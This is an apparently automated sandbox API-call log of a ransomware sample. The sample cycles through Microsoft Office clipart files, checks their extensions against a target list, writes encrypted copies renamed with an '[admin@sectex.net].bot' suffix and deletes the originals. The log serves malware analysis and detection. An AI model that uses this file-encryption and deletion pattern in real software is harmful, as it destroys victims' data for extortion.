	[0159.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.037] lstrlenW (lpString=".doc") returned 4
	[0159.037] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.037] lstrlenW (lpString=".docx") returned 5
	[0159.037] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.037] lstrlenW (lpString=".pdf") returned 4
	[0159.037] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.037] lstrlenW (lpString=".xls") returned 4
	[0159.037] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.037] lstrlenW (lpString=".xlsx") returned 5
	[0159.037] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.037] lstrlenW (lpString=".ppt") returned 4
	[0159.037] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.037] lstrlenW (lpString=".zip") returned 4
	[0159.037] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.037] lstrlenW (lpString=".rar") returned 4
	[0159.037] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.037] lstrlenW (lpString=".bz2") returned 4
	[0159.037] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.037] lstrlenW (lpString=".7z") returned 3
	[0159.037] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.037] lstrlenW (lpString=".dbf") returned 4
	[0159.037] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.037] lstrlenW (lpString=".1cd") returned 4
	[0159.037] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.037] lstrlenW (lpString=".jpg") returned 4
	[0159.037] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.038] lstrlenW (lpString=".doc") returned 4
	[0159.038] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString=".docx") returned 5
	[0159.038] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.038] lstrlenW (lpString=".pdf") returned 4
	[0159.038] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString=".xls") returned 4
	[0159.038] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.038] lstrlenW (lpString=".xlsx") returned 5
	[0159.038] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.038] lstrlenW (lpString=".ppt") returned 4
	[0159.038] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.038] lstrlenW (lpString=".zip") returned 4
	[0159.038] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.038] lstrlenW (lpString=".rar") returned 4
	[0159.038] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString=".bz2") returned 4
	[0159.038] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString=".7z") returned 3
	[0159.038] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.038] lstrlenW (lpString=".dbf") returned 4
	[0159.038] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.038] lstrlenW (lpString=".1cd") returned 4
	[0159.038] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned 63
	[0159.038] lstrlenW (lpString=".jpg") returned 4
	[0159.039] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.039] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.039] lstrlenW (lpString="J0105496.WMF") returned 12
	[0159.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.039] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5156) returned 1
	[0159.039] CloseHandle (hObject=0x3d0) returned 1
	[0159.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf")) returned 0x20
	[0159.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.040] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.040] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0159.041] GetLastError () returned 0x0
	[0159.041] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1424, lpOverlapped=0x0) returned 1
	[0159.042] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1430, lpOverlapped=0x0) returned 1
	[0159.043] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.043] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.043] SetEndOfFile (hFile=0x398) returned 1
	[0159.043] CloseHandle (hObject=0x398) returned 1
	[0159.043] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.043] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.045] CloseHandle (hObject=0x3d0) returned 1
	[0159.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf")) returned 1
	[0159.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.046] lstrlenW (lpString=".doc") returned 4
	[0159.046] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.046] lstrlenW (lpString=".docx") returned 5
	[0159.047] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.047] lstrlenW (lpString=".pdf") returned 4
	[0159.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.047] lstrlenW (lpString=".xls") returned 4
	[0159.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.047] lstrlenW (lpString=".xlsx") returned 5
	[0159.047] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.047] lstrlenW (lpString=".ppt") returned 4
	[0159.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.047] lstrlenW (lpString=".zip") returned 4
	[0159.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.047] lstrlenW (lpString=".rar") returned 4
	[0159.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.047] lstrlenW (lpString=".bz2") returned 4
	[0159.047] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.047] lstrlenW (lpString=".7z") returned 3
	[0159.047] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.047] lstrlenW (lpString=".dbf") returned 4
	[0159.047] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.047] lstrlenW (lpString=".1cd") returned 4
	[0159.047] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.047] lstrlenW (lpString=".jpg") returned 4
	[0159.047] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.047] lstrlenW (lpString=".doc") returned 4
	[0159.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.048] lstrlenW (lpString=".docx") returned 5
	[0159.048] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.048] lstrlenW (lpString=".pdf") returned 4
	[0159.048] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.048] lstrlenW (lpString=".xls") returned 4
	[0159.048] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.048] lstrlenW (lpString=".xlsx") returned 5
	[0159.048] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.048] lstrlenW (lpString=".ppt") returned 4
	[0159.048] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.048] lstrlenW (lpString=".zip") returned 4
	[0159.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.048] lstrlenW (lpString=".rar") returned 4
	[0159.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.048] lstrlenW (lpString=".bz2") returned 4
	[0159.048] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.048] lstrlenW (lpString=".7z") returned 3
	[0159.048] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.048] lstrlenW (lpString=".dbf") returned 4
	[0159.048] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.048] lstrlenW (lpString=".1cd") returned 4
	[0159.048] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned 63
	[0159.048] lstrlenW (lpString=".jpg") returned 4
	[0159.048] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.049] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.049] lstrlenW (lpString="J0105502.WMF") returned 12
	[0159.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.050] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5472) returned 1
	[0159.050] CloseHandle (hObject=0x3d0) returned 1
	[0159.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf")) returned 0x20
	[0159.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.050] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.050] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0159.051] GetLastError () returned 0x0
	[0159.051] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1560, lpOverlapped=0x0) returned 1
	[0159.410] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1570, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1570, lpOverlapped=0x0) returned 1
	[0159.410] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.411] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.411] SetEndOfFile (hFile=0x398) returned 1
	[0159.411] CloseHandle (hObject=0x398) returned 1
	[0159.411] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.411] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.415] CloseHandle (hObject=0x3d0) returned 1
	[0159.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.415] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf")) returned 1
	[0159.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.416] lstrlenW (lpString=".doc") returned 4
	[0159.416] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.416] lstrlenW (lpString=".docx") returned 5
	[0159.416] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.416] lstrlenW (lpString=".pdf") returned 4
	[0159.416] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.416] lstrlenW (lpString=".xls") returned 4
	[0159.416] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.416] lstrlenW (lpString=".xlsx") returned 5
	[0159.416] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.416] lstrlenW (lpString=".ppt") returned 4
	[0159.416] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.416] lstrlenW (lpString=".zip") returned 4
	[0159.416] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.416] lstrlenW (lpString=".rar") returned 4
	[0159.416] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.416] lstrlenW (lpString=".bz2") returned 4
	[0159.416] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.416] lstrlenW (lpString=".7z") returned 3
	[0159.416] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.416] lstrlenW (lpString=".dbf") returned 4
	[0159.417] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.417] lstrlenW (lpString=".1cd") returned 4
	[0159.417] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.417] lstrlenW (lpString=".jpg") returned 4
	[0159.417] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.417] lstrlenW (lpString=".doc") returned 4
	[0159.417] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString=".docx") returned 5
	[0159.417] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.417] lstrlenW (lpString=".pdf") returned 4
	[0159.417] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString=".xls") returned 4
	[0159.417] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.417] lstrlenW (lpString=".xlsx") returned 5
	[0159.417] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.417] lstrlenW (lpString=".ppt") returned 4
	[0159.417] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.417] lstrlenW (lpString=".zip") returned 4
	[0159.417] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.417] lstrlenW (lpString=".rar") returned 4
	[0159.417] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString=".bz2") returned 4
	[0159.417] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.417] lstrlenW (lpString=".7z") returned 3
	[0159.418] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.418] lstrlenW (lpString=".dbf") returned 4
	[0159.418] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.418] lstrlenW (lpString=".1cd") returned 4
	[0159.418] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned 63
	[0159.418] lstrlenW (lpString=".jpg") returned 4
	[0159.418] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.418] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.418] lstrlenW (lpString="J0105912.WMF") returned 12
	[0159.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.463] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=11720) returned 1
	[0159.463] CloseHandle (hObject=0x3d8) returned 1
	[0159.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf")) returned 0x20
	[0159.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.494] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.495] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0159.495] GetLastError () returned 0x0
	[0159.495] ReadFile (in: hFile=0x3d8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2dc8, lpOverlapped=0x0) returned 1
	[0159.516] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2dd0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2dd0, lpOverlapped=0x0) returned 1
	[0159.517] ReadFile (in: hFile=0x3d8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.517] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.517] SetEndOfFile (hFile=0x3b8) returned 1
	[0159.517] CloseHandle (hObject=0x3b8) returned 1
	[0159.518] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.518] SetEndOfFile (hFile=0x3d8) returned 1
	[0159.520] CloseHandle (hObject=0x3d8) returned 1
	[0159.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.536] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105912.wmf")) returned 1
	[0159.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.649] lstrlenW (lpString=".doc") returned 4
	[0159.650] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString=".docx") returned 5
